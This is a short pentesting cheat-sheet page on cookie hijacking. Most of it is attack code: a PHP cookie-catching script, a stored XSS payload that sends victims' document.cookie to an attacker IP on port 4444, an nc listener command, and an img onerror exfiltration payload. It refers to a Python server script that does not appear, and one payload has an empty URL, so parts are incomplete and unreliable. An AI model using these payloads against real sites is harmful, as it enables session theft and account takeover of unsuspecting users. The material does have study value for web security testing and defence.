Cookie Hijacking

Last modified: 2023-04-21

Cookie Web

A methodology of manipulating, grabbing cookies.

Cookie: PHPSESSID=999

<!-- ASCII Hex -->
Cookie: PHPSESSID=3836382d61646d696e

In your local machine, create the payload for grabbing the cookie when the other user will access your machine.

// steal_cookie.php

<?php echo $_GET['cookie']; ?>

Create the JavaScript code to force users to access your machine which shows the victim's cookie value.

<script>document.location = 'http://<attacker-ip>:4444/steal_cookie.php?cookie='+document.cookie</script>

POST request with this JavaScript code to the target web page.
Open listner in your local machine and wait for the other users will access the target web page.

nc -lvnp 4444

This script is useful to steal Cookie.
To start web server, execute the Python script as below.


Then inject our XSS to steal Cookie via our web server.
For instance,

<img src=x onerror=this.src=''+document.cookie;>